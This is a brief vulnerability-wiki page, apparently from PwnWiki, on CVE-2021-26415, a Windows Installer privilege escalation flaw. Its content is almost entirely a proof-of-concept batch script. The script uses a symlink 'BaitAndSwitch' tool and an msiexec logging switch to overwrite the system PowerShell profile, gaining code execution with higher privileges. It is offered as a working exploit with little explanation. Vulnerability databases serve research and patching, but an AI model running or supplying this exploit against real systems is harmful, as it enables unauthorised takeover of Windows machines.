Loading
0

CVE-2021-26415 Windows Installer 特权提升漏洞

PWNWIK.COM

,

POC

@echo off
REM Put BaitAndSwitch, example.msi into C:\temp
echo > C:\temp\fakelog.txt
start C:\temp\BaitAndSwitch C:\temp\linkdir\link C:\temp\fakelog.txt C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
timeout /t 1
msiexec /j C:\temp\example.msi /t ksz /Li! C:\temp\linkdir\link /qn

免费、自由、人人可编辑的漏洞库--PwnWiki.com